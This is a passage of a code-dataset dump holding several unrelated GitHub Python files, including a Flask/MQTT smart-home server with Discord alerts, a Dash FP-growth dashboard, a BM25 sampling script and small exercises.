= sum(d[c] for c in fight if c in d)\n \n return {r==0:\"Let's fight again!\",\n r>0:\"Left side wins!\",\n r<0:\"Right side wins!\"\n }[True]\n \"\"\"","repo_name":"heenashree/AlgorithmsAndDataStructs","sub_path":"Python Codes/XML-YAML/WinWar.py","file_name":"WinWar.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"257381019","text":"from datetime import datetime as dt\nimport texttable\n\n\nclass Method(object):\n def __init__(self, description, action):\n self.description = description\n self.action = action\n\n\nclass Case(object):\n def __init__(self, name, *args, **kwargs):\n self.name = name\n self.args = args\n self.kwargs = kwargs\n\n\ndef run_experiment(clean_up_action, methods, cases):\n timings = {}\n\n for case in cases:\n for method in methods:\n clean_up_action()\n start_time = dt.now()\n method.action(*case.args, **case.kwargs)\n elapsed_time = dt.now() - start_time\n\n if method.description not in timings:\n timings[method.description] = {}\n\n timings[method.description][case.name] = elapsed_time\n\n table = texttable.Texttable(max_width=0)\n\n col_dtypes = [\"t\"]\n header = [\"Method\"]\n for case in cases:\n col_dtypes.append(\"a\")\n header.append(case.name)\n\n table.set_cols_dtype(col_dtypes)\n table.add_row(header)\n\n for method_desc, method_timings in timings.items():\n row = [method_desc]\n for _, case_time in method_timings.items():\n row.append(str(case_time).split('.')[0])\n\n table.add_row(row)\n\n print(table.draw())\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"market/prototype_testing/experiment.py","file_name":"experiment.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39278682596","text":"from Circuit_element import Element_R\nfrom Circuit_element import Element_V\nfrom Circuit_element import Element_I\nfrom Circuit_control import Control_op\nfrom Circuit_control import Control\n\ndef netlist_element_deal(net_line):\n elem = net_line.split()\n # result [obj,statue]\n # statue 0 : Element obj , 1 : Control obj , 2 : Model obj , 0 < error\n if Control.Control.Control_statue == 0:\n if elem[0][0] == 'v' or elem[0][0] == 'V': #DC source\n obj = Element_V.Element_V(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0][0] == 'i' or elem[0][0] == 'I': #AC source\n obj = Element_I.Element_I(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0][0] == 'r' or elem[0][0] == 'R': #Resistor\n obj = Element_R.Element_R(elem[0])\n obj.import_elem(elem[1],elem[2],elem[3:])\n return [obj,0]\n elif elem[0].lower() == '.op': # OP sim\n obj = Control_op.Control_op(elem)\n return [obj,1]\n elif elem[0].lower() == '.control': #Control deck\n obj = Control.Control_control()\n return [obj,1]\n elif elem[0].lower() == '.end': #Netlist end\n obj = Control.Control_end()\n return [obj,1]\n else:\n return [-3,-3]\n elif Control.Control.Control_statue == 1:\n if elem[0].lower() == '.endc': #Control deck end\n obj = Control.Control_endc()\n return [obj,1]\n else:\n obj = Control.Ngspice_control(elem)\n return [obj,1]\n elif Control.Control.Control_statue == -1:\n print(\"Netlist End\")\n return [-1,-1]\n else :\n print(str(elem))\n return [-2,-2]\n","repo_name":"tang5722917/spice_netlist_front_end","sub_path":"src/circuit_element_func.py","file_name":"circuit_element_func.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36492579654","text":"import dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport dash_bootstrap_components as dbc\nimport pandas as pd\nimport dash_table\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport numpy as np\nfrom app import app\ndf_fp = pd.read_csv('../output/dataMining/FP_Growth_ar.csv')\ndf_perf = pd.read_csv('../output/dataMining/FP_Growth_performance.csv')\n# def generate_table(dataframe, max_rows=10):\n# return dbc.Table([\n# html.Thead(\n# html.Tr([html.Th(col) for col in dataframe.columns])\n# ),\n# html.Tbody([\n# html.Tr([\n# html.Td(dataframe.iloc[i][col]) for col in dataframe.columns\n# ]) for i in range(min(len(dataframe), max_rows))\n# ])\n# ],\n# bordered=True,\n# hover=True,\n# responsive=True,\n# striped=True,\n# size=\"md\",id=\"dtBasicExample\")\n\nfig2 = px.scatter(df_perf, x=\"support\", y=\"time\", color=\"confidence\",color_continuous_scale=px.colors.sequential.Viridis,log_x=True, render_mode=\"webgl\")\nfig2.layout.paper_bgcolor = '#fafafa'\n\nlayout=html.Div(children=[\n dbc.Row(html.H1('FP-growth',style={\n 'text-align' : 'center'\n\n },className=\"mx-auto mt-20\"))\n ,\n html.Hr(),\n\n dbc.Row(html.H2('rule generated by FP-growth',style={\n 'text-align' : 'center'\n\n },className=\"mx-auto mt-20\")),\n html.Hr(),\n dbc.Row([\n dbc.Col(dbc.Card(\n [\n \n dbc.CardBody(\n [\n html.H4(str(round(df_fp['confidence'].max(),2)), className=\"card-title\"),\n html.P(\"best confidence\", className=\"card-text\"),\n ]\n ),\n \n ],color=\"info\", outline=True\n \n )),\n dbc.Col(dbc.Card(\n [\n \n dbc.CardBody(\n [\n html.H4(str(round(df_fp['lift'].max(),2)), className=\"card-title\"),\n html.P(\"best lift\", className=\"card-text\"),\n ]\n ),\n \n ],color=\"info\", outline=True\n \n )),\n dbc.Col(dbc.Card(\n [\n \n dbc.CardBody(\n [\n html.H4(str(round(df_fp['leverage'].max(),2)), className=\"card-title\"),\n html.P(\"best leverage\", className=\"card-text\"),\n ]\n ),\n \n ],color=\"info\", outline=True\n \n )),\n dbc.Col(dbc.Card(\n [\n \n dbc.CardBody(\n [\n html.H4(str(round(df_fp['conviction'].max(),2)), className=\"card-title\"),\n html.P(\"best conviction\", className=\"card-text\"),\n ]\n ),\n \n ],color=\"info\", outline=True\n \n ))\n ]),\n\n html.Hr(),\n\n html.Div(dash_table.DataTable(\n id='datatable-paging',\n columns=[{\"name\": i, \"id\": i} for i in df_fp.columns],\n data=df_fp.to_dict(\"records\"),\n editable=False,\n filter_action=\"native\",\n sort_action=\"native\",\n sort_mode=\"multi\",\n page_action=\"native\",\n page_current= 0,\n page_size= 10,\n style_data_conditional=[\n {\n 'if': {'row_index': 'odd'},\n 'backgroundColor': 'rgb(248, 248, 248)'\n }\n ],\n style_header={\n 'backgroundColor': 'rgb(230, 230, 230)',\n 'fontWeight': 'bold'\n }\n )),\n html.Hr(),\n\n dbc.Row(html.H2('line chart of excution time by confidence and support', style={\n 'text-align': 'center'\n\n }, className=\"mx-auto my-20\"))\n ,\n dbc.Row([dbc.Col(dbc.Card([\n dbc.CardHeader(html.H4(\"Controleur\"))\n ,\n dbc.CardBody([\n dbc.FormGroup(\n [\n dbc.Label(\"transaction number\"),\n dcc.Dropdown(\n id='transaction',\n options=[{'label': i, 'value': i} for i in list(df_perf['transaction_number'].unique())],\n value=\"980\",\n searchable=False,\n clearable=False\n ),\n ]\n ),\n dbc.FormGroup(\n [\n dbc.Label(\"X variable\"),\n dcc.Dropdown(\n id=\"x-variable\",\n options=[\n {\"label\": col, \"value\": col} for col in [\"confidence\",\"support\"]\n ],\n value=\"support\",\n searchable=False,\n clearable=False\n\n ),\n ]\n )])]),width=3),\n dbc.Col(dcc.Graph(id=\"line-graph\"),width=9)],className=\"align-items-center\"),\n html.Hr(),\n dbc.Row(html.H2(\"Multi-Varibales scatter plot\",className=\"mx-auto mt-20\")),\n dbc.Row(dbc.Col(dcc.Graph(figure=fig2)))\n ])\n\n\n@app.callback(\n Output('line-graph', 'figure'),\n [Input('transaction', 'value'),\n Input('x-variable', 'value')])\ndef update_graph(transaction_number, x_variable):\n\n fig1 = px.line(x=df_perf[df_perf.transaction_number == int(transaction_number)].groupby(x_variable)[['time']].mean().index.tolist(),\n y=df_perf[df_perf.transaction_number == int(transaction_number)].groupby(x_variable)[['time']].mean().values)\n fig1.update_yaxes(title_text='avrage execution Time(s)')\n fig1.update_xaxes(title_text=x_variable)\n fig1.update_layout(xaxis_type=\"log\")\n fig1.layout.paper_bgcolor = '#fafafa'\n return fig1\n\n\n#@app.callback(\n# Output(\"fp_tab\", \"children\"),\n# [Input(\"input_text\", \"value\")]\n#)\n#def cb_render(vals):\n# return generate_table(df_fp,max_rows=int(vals))\n\n\n","repo_name":"Hassaine/recommender-system","sub_path":"dashboards/pages/fp_growth_dash.py","file_name":"fp_growth_dash.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28787435032","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 4 20:55:36 2023\n\n@author: Christoffer\n\"\"\"\n\nfrom pyfluidproperties import properties as prop\nfrom pyfluidproperties import fluid_id, unit_sys\nfrom dimensionless_numbers import dimensionless_numbers\n\nimport numpy as np\n\ndef main():\n \n ### Inputs ###\n pressure = 10.3 # bar(a)\n temperature = 250 # C\n \n pipe_diameter = 80*1e-3 # m\n pipe_length = 100 # m\n roughness = .05*1e-3 # m\n \n mass_flow = .5 # kg/s \n \n ### Init objects ###\n fluid = prop(fluid = fluid_id.Water, unit_system = unit_sys.SI_bar_kJ)\n dim_num = dimensionless_numbers(fluid)\n \n ### Calculations ###\n fluid.update(p = pressure, T = temperature)\n \n pipe_area = pipe_diameter**2*np.pi/4\n fluid_velocity = mass_flow/fluid.rho/pipe_area\n \n re_d = dim_num.reynolds_number(fluid_velocity, pipe_diameter)\n fric = friction_factor(pipe_diameter, roughness, re_d)\n \n pressure_loss = fric*pipe_length/pipe_diameter*.5*fluid.rho*fluid_velocity**2\n \n ### Output ###\n print(fluid)\n print(f'Fluid velocity = {fluid_velocity:.1f} m/s, pressure loss = {(pressure_loss*1e-5):.2f} bar')\n\n \ndef friction_factor(pipe_diameter,roughness, reynolds_number):\n \"\"\"\n Returns the darcy friction factor using \n Swamee-Jain approximation (turbulent flow)\n\n Parameters\n ----------\n pipe_diameter: float pipe diameter (m)\n roughness : float roughness eps (m)\n reynolds_number : float Reynolds number (-)\n\n Returns\n -------\n float darcy friction factor (-)\n\n \"\"\"\n \n reynolds_laminar = 2000 # (-)\n reynold_turbulent = 4000 # (-)\n \n if reynolds_number < reynolds_laminar:\n friction_factor = 64/ reynolds_number\n else:\n # Swamee-Jain\n relative_roughness = roughness/pipe_diameter\n friction_factor = 0.25/((np.log10((relative_roughness/3.7)+(5.74/(reynolds_number**.9))))**2)\n if reynolds_number <= reynold_turbulent:\n print('Warning, Critical regime. Flow is unsteady, Laminar friction factor assumed -> higher pressure loss')\n return friction_factor\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ChristofferRa/pyfluidproperties","sub_path":"examples/pressure_loss.py","file_name":"pressure_loss.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9401619067","text":"from collections import defaultdict\nimport pyterrier as pt\nif not pt.started():\n pt.init(boot_packages=[\"com.github.terrierteam:terrier-prf:-SNAPSHOT\"])\nfrom pyterrier.model import split_df\nfrom fire import Fire\nimport pandas as pd\nfrom tqdm import tqdm\nimport logging\nimport json\nimport re\nfrom math import ceil\nimport ir_datasets as irds\nfrom pyterrier_pisa import PisaIndex\nfrom os.path import join\n\ndef convert_to_dict(result):\n result = result.groupby('qid').apply(lambda x: dict(zip(x['docno'], zip(x['score'], x['rank'])))).to_dict()\n return result\n\ndef pivot_batch(batch):\n records = []\n pos_list = batch.apply(lambda x : (str(x.qid), str(x.doc_id_a)), axis=1).tolist()\n for row in batch.itertuples():\n records.extend([{\n 'qid': str(row.qid),\n 'docno': str(row.doc_id_a),\n },\n ])\n return pd.DataFrame.from_records(records), pos_list\n\ndef convert_to_dict(result):\n result.drop_duplicates(['qid', 'docno'], inplace=True)\n lookup = defaultdict(lambda : defaultdict(int))\n for row in result.itertuples():\n lookup[str(row.qid)][str(row.docno)] = float(row.score)\n return lookup\n\ndef sample_neg(neg_pool, num_negs):\n if len(neg_pool) < num_negs:\n logging.info(f'not enough negs, sampling with replacement {len(neg_pool)} < {num_negs}')\n return neg_pool.sample(n=num_negs, replace=True)\n else:\n return neg_pool.sample(n=num_negs)\n\nclean = lambda x : re.sub(r\"[^a-zA-Z0-9¿]+\", \" \", x)\n\ndef main(out_path : str, \n subset : int = 100000, \n num_negs : int = 32, \n batch_size : int = 1000, \n data_split : str = 'train/triples-small',\n docpairs_file : str = None,\n val_split : int = None):\n \n dataset = irds.load(f\"msmarco-passage/{data_split}\")\n queries = pd.DataFrame(dataset.queries_iter()).set_index('query_id')['text'].to_dict()\n docs = pd.DataFrame(dataset.docs_iter()).set_index('doc_id')['text'].to_dict()\n\n pt_index = pt.get_dataset(\"msmarco_passage\").get_index(\"terrier_stemmed\")\n pt_index = pt.IndexFactory.of(pt_index, memory=False)\n bm25_scorer = pt.text.scorer(body_attr=\"text\", wmodel=\"BM25\", background_index=pt_index)\n index = PisaIndex.from_dataset(\"msmarco_passage\", threads=8)\n\n def get_query_text(x):\n df = pd.DataFrame({'qid' : x.values, 'query' : x.apply(lambda qid : clean(queries[str(qid)]))})\n return df\n\n bm25 = pt.apply.generic(lambda x : get_query_text(x)) >> index.bm25(k1=1.2, b=0.75, num_results=1000) >> pt.text.get_text(pt.get_dataset('irds:msmarco-passage/train/triples-small'), 'text')\n \n def score(batch, norm=False):\n new, _ = pivot_batch(batch.copy())\n topics = new['qid'].drop_duplicates()\n # score with bm25 over all topics and if any (qid docno) pair from new is missing, rsecore missing records with bm25 scorer \n res = bm25.transform(topics)[['qid', 'docno', 'score']]\n\n new['query'] = new['qid'].apply(lambda qid : clean(queries[str(qid)]))\n new['text'] = new['docno'].apply(lambda qid : clean(docs[str(qid)]))\n batch_score = bm25_scorer.transform(new)[['qid', 'docno', 'score']]\n res = pd.concat([res, batch_score]).drop_duplicates(['qid', 'docno']).reset_index(drop=True)\n\n if norm:\n # minmax norm over each query score set \n res['score'] = res.groupby('qid', group_keys=False)['score'].apply(lambda x: (x - x.min()) / (x.max() - x.min()))\n return res\n\n if docpairs_file:\n train = pd.read_csv(docpairs_file, sep='\\t', index_col=False)\n else: \n train = pd.DataFrame(dataset.docpairs_iter()).rename(columns={'query_id': 'qid',})\n \n qrels = pd.DataFrame(dataset.qrels_iter()).rename(columns={'query_id': 'qid'})\n\n if val_split:\n val = pd.DataFrame({'qid' : [], 'doc_id_a': []})\n val_to_retrieve = val_split\n while val_to_retrieve > 0:\n tmp = train.drop_duplicates('qid').sample(n=val_to_retrieve)\n tmp = tmp[tmp['qid'].isin(qrels['qid'].unique()) & ~tmp['qid'].isin(val['qid'].unique())]\n train = train[~train['qid'].isin(tmp['qid'])]\n val_to_retrieve -= len(tmp)\n val = pd.concat([val, tmp[['qid', 'doc_id_a']]])\n val.rename(columns={'doc_id_a': 'docno'}, inplace=True)\n\n # get top 100 by score by sorting by qid and score then take top 100 grouped by qid\n ranks = bm25.transform(val['qid'].drop_duplicates())[['qid', 'docno', 'score']].sort_values(['qid', 'score'], ascending=[True, False]).groupby('qid').head(100)[['qid', 'docno']]\n val = pd.concat([val, ranks]).drop_duplicates(['qid', 'docno'])\n val['score'] = 0.\n val.to_csv(join(out_path, f'triples.{num_negs}.val.tsv.gz'), sep='\\t', index=False)\n\n to_retrieve = subset \n main_lookup = {}\n new_set = []\n\n while to_retrieve > 0: \n sub = train.sample(n=to_retrieve).rename(columns={'doc_id_b': 'doc_id_b_0',})\n for _sub in tqdm(split_df(sub, ceil(len(sub) / batch_size)), desc=\"Total Batched Iter\"):\n _triples = _sub.copy()\n new, pos_list = pivot_batch(_triples)\n res = score(_sub, norm=True).groupby('qid').filter(lambda x : len(x) >= num_negs)\n _triples = _triples[_triples['qid'].isin(res['qid'].unique())]\n to_retrieve -= len(_triples)\n neg_pool = res.copy()\n neg_pool = neg_pool[~neg_pool[['qid', 'docno']].isin(pos_list)].reset_index(drop=True)\n negs = neg_pool.groupby('qid').apply(lambda x : sample_neg(x, num_negs)).reset_index(drop=True)[['qid', 'docno']]\n new = pd.concat([new, negs])\n negs = negs.groupby('qid')['docno'].apply(list).to_dict()\n\n _triples['doc_id_b'] = _triples['qid'].apply(lambda x : negs[str(x)])\n\n results_lookup = convert_to_dict(res)\n\n def lookup(x):\n try:\n return results_lookup[str(x.qid)][str(x.docno)]\n except KeyError:\n if (str(x.qid), str(x.docno)) in pos_list: return 1.\n return 0.\n new['score'] = new.apply(lambda x : lookup(x), axis=1)\n main_lookup.update(convert_to_dict(new))\n new_set.append(_triples[['qid', 'doc_id_a', 'doc_id_b']])\n\n with open(join(out_path, f'lookup.{num_negs}.json'), 'w') as f:\n json.dump(main_lookup, f)\n \n new_set = pd.concat(new_set)\n new_set.to_csv(join(out_path, f'triples.{num_negs}.train.tsv.gz'), sep='\\t', index=False)\n\n\n return \"Done!\"\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n Fire(main)","repo_name":"Parry-Parry/LexicalDistillation","sub_path":"lexdistill/util/exhaustive_sample.py","file_name":"exhaustive_sample.py","file_ext":"py","file_size_in_byte":6720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1265071249","text":"from flask import Flask, g, request\nfrom flask_cors import CORS\nfrom discord_webhook import DiscordWebhook, DiscordEmbed\nimport paho.mqtt.client as mqtt\nfrom threading import Thread, Timer\nfrom shared.services.mysql_service import MySQLService\nfrom dotenv import load_dotenv\nimport os, ast, requests, datetime, airporttime, pytz, json\n\nfrom cheryl_node import bp_cheryl\nfrom john_node import bp_john\nfrom timmy_node import bp_timmy\nfrom main import bp_main\n\nload_dotenv()\n\nlights_dict = {\n \"1\": 1,\n \"Corridor\": 2,\n \"2\": 3,\n}\n\naircon_dict = {\n \"1\": 4,\n \"2\": 5\n}\n\napp = Flask(__name__)\napp.config['JSON_SORT_KEYS'] = False\napp.secret_key = os.getenv(\"APP_SECRET_KEY\")\n\ncors = CORS(app, resources={r\"/api/*\" : {\"origins\": \"*\"}})\n\napp.register_blueprint(bp_cheryl, url_prefix='/api/node_1')\napp.register_blueprint(bp_john, url_prefix='/api/node_2')\napp.register_blueprint(bp_timmy, url_prefix='/api/node_3')\napp.register_blueprint(bp_main)\n\n@app.route('/webhook', methods=['POST'])\ndef webhook():\n Thread(target=lambda: [os.system(\"git pull\")]).start()\n return \"ok\"\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return ('''\n

    Not Found

    \n

    The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.

    \n \n '''), 404\n\ndef request_has_connection():\n return (\n (\"dbconn\" in g) and (g.dbconn is not None)\n and\n (\"client\" in g)\n )\n\n@app.before_request\ndef get_request_connection():\n if not request_has_connection():\n g.dbconn = MySQLService(os.getenv(\"CLOUD_DATABASE_HOST\"), os.getenv(\"CLOUD_DATABASE_USERNAME\"), os.getenv(\"CLOUD_DATABASE_PASSWORD\"), os.getenv(\"CLOUD_DATABASE_NAME\")) # type: ignore\n g.client = client\n\n@app.teardown_request\ndef close_db_connection(ex):\n if request_has_connection():\n dbconn = g.pop('dbconn', None)\n g.pop('client', None)\n if (dbconn is not None):\n dbconn.close()\n\ndef on_connect(client, userdata, flags, rc):\n print(f\"Connected with RC: {str(rc)}\")\n pass\n \ndef on_publish(client, data, result):\n print(\"Message sent to MQTT broker\")\n pass\n\ndef on_message(client, userdata, msg):\n message_mqtt = msg.payload.decode()\n if (msg.topic not in [\"/cheryl_node\", \"/john_node\", \"/timmy_node\"]):\n print(\"Received unknown topic message: \", message_mqtt)\n if msg.topic == \"/john_node\":\n json_message = ast.literal_eval(message_mqtt)\n if (json_message[\"sender\"] == \"Edge\"):\n message = None\n if (json_message[\"title\"] == \"Lights\"):\n with mqtt_dbconn:\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [int(json_message[\"status\"]), lights_dict[json_message[\"room\"]]])\n message = \"Lights in \" + json_message[\"room\"] + \" turned \" + (\"On\" if (int(json_message[\"status\"]) == 1) else \"Off\")\n elif (json_message[\"title\"] == \"Room Count\"):\n with mqtt_dbconn:\n if (json_message[\"action\"] == \"Inc\"):\n mqtt_dbconn.increment_field(\"people_in_room\", [\"room\"], \"people_count\", [int(json_message[\"room\"])])\n elif (json_message[\"action\"] == \"Dec\"):\n mqtt_dbconn.decrement_field(\"people_in_room\", [\"room\"], \"people_count\", [int(json_message[\"room\"])])\n elif (json_message[\"title\"] == \"Update Uptime\"):\n with mqtt_dbconn:\n today = datetime.date.today().strftime(\"%Y-%m-%d\")\n data = mqtt_dbconn.get_by_id(\"appliance_uptime\", [\"appliance_id\", \"date\"], [json_message[\"appliance_id\"], today])\n if data is None:\n mqtt_dbconn.insert(\"appliance_uptime\", [\"appliance_id\", \"uptime\", \"date\"], [json_message[\"appliance_id\"], int(json_message[\"uptime\"]), today])\n else:\n mqtt_dbconn.update(\"appliance_uptime\", [\"uptime\"], [\"appliance_id\", \"date\"], [int(json_message[\"uptime\"]), json_message[\"appliance_id\"], today])\n if message is not None:\n webhook = DiscordWebhook(\n url=os.getenv(\"AUTOMATION_DISCORD_WEBHOOK\"), \n username=\"Home Appliance Bot\"\n )\n embed = DiscordEmbed(\n title=\"Home Appliance Webhook\", \n description=message, \n color=\"03b2f8\",\n url = \"https://dashboard.digitalserver.tech/home_control\"\n )\n webhook.add_embed(embed)\n webhook.execute()\n print(\"Received John's MQTT message: \", msg.payload.decode()) \n if msg.topic == \"/cheryl_node\":\n if (\",\" in message_mqtt and \"Update Wetness Threshold\" not in message_mqtt):\n wetness, light_intensity, temperature = message_mqtt.split(\",\")\n with mqtt_dbconn:\n mqtt_dbconn.insert(\"environment_data\", [\"temperature\", \"wetness\", \"brightness\"], [temperature, wetness, light_intensity])\n if msg.topic == \"/timmy_node\":\n timmyNodeMessage = message_mqtt.split(\",\")\n if timmyNodeMessage[0] == \"history\":\n profileID = timmyNodeMessage[1]\n currentTime = timmyNodeMessage[2]\n currentDate = timmyNodeMessage[3]\n userHeight = timmyNodeMessage[4]\n potentiometerWeight = timmyNodeMessage[5]\n bmi = timmyNodeMessage[6]\n inHouse = timmyNodeMessage[7]\n \n with mqtt_dbconn:\n mqtt_dbconn.insert(\"History\", [\"profile_id\", \"time\", \"date\", \"height\", \"weight\", \"bmi\", \"in_house\"], [profileID, currentTime, currentDate, userHeight, potentiometerWeight, bmi, inHouse])\n if timmyNodeMessage[0] == \"profile\":\n profileID = timmyNodeMessage[1]\n userHeight = timmyNodeMessage[2]\n potentiometerWeight = timmyNodeMessage[3]\n bmi = timmyNodeMessage[4]\n inHouse = timmyNodeMessage[5]\n \n with mqtt_dbconn:\n mqtt_dbconn.update(\"Profile\", [\"height\", \"weight\", \"bmi\", \"in_house\"], [\"profile_id\"], [userHeight, potentiometerWeight, bmi, inHouse, profileID])\n if timmyNodeMessage[0] == \"stranger\":\n currentTime = timmyNodeMessage[1]\n currentDate = timmyNodeMessage[2]\n strangerMessage = timmyNodeMessage[3]\n \n with mqtt_dbconn:\n mqtt_dbconn.insert(\"Stranger\", [\"time\", \"date\", \"status\"], [currentTime, currentDate, strangerMessage])\n john_message = {\n \"title\": \"Intruder\",\n \"sender\": \"Cloud\",\n }\n client.publish(\"/john_node\", json.dumps(john_message))\n with mqtt_dbconn:\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 1])\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 2])\n mqtt_dbconn.update(\"appliance_status\", [\"status\"], [\"appliance_id\"], [1, 3])\n client.publish(\"/cheryl_node\", \"Spray at intruder\")\n webhook = DiscordWebhook(\n url=os.getenv(\"ALARM_DISCORD_WEBHOOK\"), \n username=\"Security Bot\"\n )\n embed = DiscordEmbed(\n title=\"Security Webhook\", \n description=\"An intruder has been detected!\", \n color=\"03b2f8\",\n url = \"https://dashboard.digitalserver.tech/smart_security\"\n )\n webhook.add_embed(embed)\n webhook.execute()\n print(\"Received Timmy's MQTT message: \", message_mqtt)\n\n# @app.template_filter('config_name_to_id')\n# def config_name_to_id(config_name):\n# return config_name.lower().replace(\" \", \"-\").replace(\"(\", \"9\").replace(\")\", \"0\")\n\ndef query_weather(city):\n\n base_url = 'http://api.weatherapi.com/v1/forecast.json'\n apt = airporttime.AirportTime(iata_code=city)\n\n converted_datetime = apt.from_utc(datetime.datetime.utcnow())\n offset = converted_datetime.strftime(\"%z\")\n timezone = pytz.FixedOffset(int(offset[1:3]) * 60 + int(offset[3:5]))\n given_datetime = converted_datetime.replace(tzinfo=pytz.UTC).astimezone(timezone)\n desired_time = given_datetime.strftime(\"%H\")\n \n params = {\n 'key': os.getenv(\"WEATHER_API_KEY\"),\n 'q': f\"iata:{city}\",\n 'hour': desired_time,\n }\n \n try:\n response = requests.get(base_url, params=params)\n response.raise_for_status() # Raise an exception for HTTP errors\n\n data = response.json()\n # Extract the desired weather information from the response\n will_it_rain = int(data['forecast']['forecastday'][0]['hour'][0]['will_it_rain'])\n chance_of_rain = int(data['forecast']['forecastday'][0]['hour'][0]['chance_of_rain'])\n return [will_it_rain, chance_of_rain]\n except requests.exceptions.RequestException as e:\n print('Error occurred during the API request:', e)\n return None\n\ndef every_minute_function():\n #do something every minute\n print(\"every_minute_function\")\n pass\n\ndef every_hour_ten_offset_function():\n #do something every hour (10 minutes before the next hour)\n will_it_rain, chance_of_rain = query_weather(\"KCH\")\n message = f\"It seems like it will be raining in the next hour. Chance of rain: {chance_of_rain}%\" if will_it_rain else f\"It seems like it will not be raining in the next hour. Chance of rain: {chance_of_rain}%\"\n webhook = DiscordWebhook(\n url=os.getenv(\"SPRINKLER_DISCORD_WEBHOOK\"), \n username=\"Weather Notification Bot\"\n )\n embed = DiscordEmbed(\n title=\"Weather Webhook\", \n description=message, \n color=\"03b2f8\",\n url = \"https://dashboard.digitalserver.tech/\"\n )\n if (will_it_rain == 1):\n client.publish(\"/cheryl_node\", \"Gonna Rain\")\n webhook.add_embed(embed)\n webhook.execute()\n\ndef every_hour_function():\n #do something every hour\n print(\"Hourly function\")\n pass\n\ndef every_minute_cron_thread():\n global minute_timer\n # Run the function every minute\n if minute_timer is not None:\n minute_timer.cancel()\n minute_timer = Timer(60, every_minute_cron_thread).start()\n every_minute_function()\n\ndef every_hour_ten_offset_cron_thread():\n global hour_ten_offset_timer\n # Run the function every hour\n current_time = datetime.datetime.now()\n # Calculate the time until the next hour\n time_until_next_hour = (((60 - current_time.minute) * 60) - current_time.second) - 600 # 10 minutes before the next hour\n if (time_until_next_hour <= 0):\n time_until_next_hour = 3600\n print(time_until_next_hour)\n if hour_ten_offset_timer is not None:\n hour_ten_offset_timer.cancel()\n hour_ten_offset_timer = Timer(time_until_next_hour, every_hour_ten_offset_cron_thread).start()\n every_hour_ten_offset_function()\n\ndef every_hour_cron_thread():\n global hour_timer\n # Run the function every hour\n current_time = datetime.datetime.now()\n # Calculate the time until the next hour\n time_until_next_hour = ((60 - current_time.minute) * 60) - current_time.second\n if hour_timer is not None:\n hour_timer.cancel()\n hour_timer = Timer(time_until_next_hour, every_hour_cron_thread).start()\n every_hour_function()\n\nminute_timer = None\nhour_ten_offset_timer = None\nhour_timer = None\n\nif __name__ == \"__main__\":\n client = mqtt.Client()\n mqtt_dbconn = MySQLService(os.getenv(\"CLOUD_DATABASE_HOST\"), os.getenv(\"CLOUD_DATABASE_USERNAME\"), os.getenv(\"CLOUD_DATABASE_PASSWORD\"), os.getenv(\"CLOUD_DATABASE_NAME\"))\n client.username_pw_set(username=os.getenv(\"CLOUD_MQTT_USERNAME\"), password=os.getenv(\"CLOUD_MQTT_PASSWORD\")) # type: ignore\n client.on_connect = on_connect \n client.on_publish = on_publish\n client.on_message = on_message\n client.connect(os.getenv(\"CLOUD_MQTT_HOST\"), int(os.getenv(\"CLOUD_MQTT_PORT\")), 60) # type: ignore\n topic = [(\"/john_node\", 0), (\"/cheryl_node\", 0), (\"/timmy_node\", 0)]\n client.subscribe(topic)\n client.loop_start()\n # sensor_thread = Thread(target=read_serial_input)\n # sensor_thread.daemon = True\n # sensor_thread.start()\n every_minute_cron_thread()\n every_hour_cron_thread()\n every_hour_ten_offset_cron_thread()\n app.run(host=\"0.0.0.0\", port=8080, debug=True, use_reloader=False)\n","repo_name":"JohnChung2002/SmartHomePlus","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9233117645","text":"import math\r\n\r\ncount_magnolias = int(input())\r\n\r\ncount_hyacinth = int(input())\r\n\r\ncount_roses = int(input())\r\n\r\ncount_cacti = int(input())\r\n\r\nprice_present = float(input())\r\n\r\ncost_magnolias_total = float(count_magnolias * 3.25)\r\n\r\ncost_hyacinth_total = float(count_hyacinth * 4)\r\n\r\ncost_roses_total = float(count_roses * 3.5)\r\n\r\ncost_cacti_total = float(count_cacti * 8)\r\n\r\ncost_total=float(cost_magnolias_total+cost_hyacinth_total+cost_roses_total+\r\n cost_cacti_total)\r\n\r\nprofit_total=float(cost_total*.95)\r\n\r\nif price_present<=profit_total:\r\n amount_money_left=math.floor(profit_total-price_present)\r\n print(f\"She is left with {amount_money_left} leva.\")\r\n\r\nelse:\r\n amount_money_needed=math.ceil(price_present-profit_total)\r\n print(f\"She will have to borrow {amount_money_needed} leva.\")","repo_name":"Pandam0n1um/SoftUni-Software-Engineering","sub_path":"Programming Basics with Python - May 2021/02-Conditional 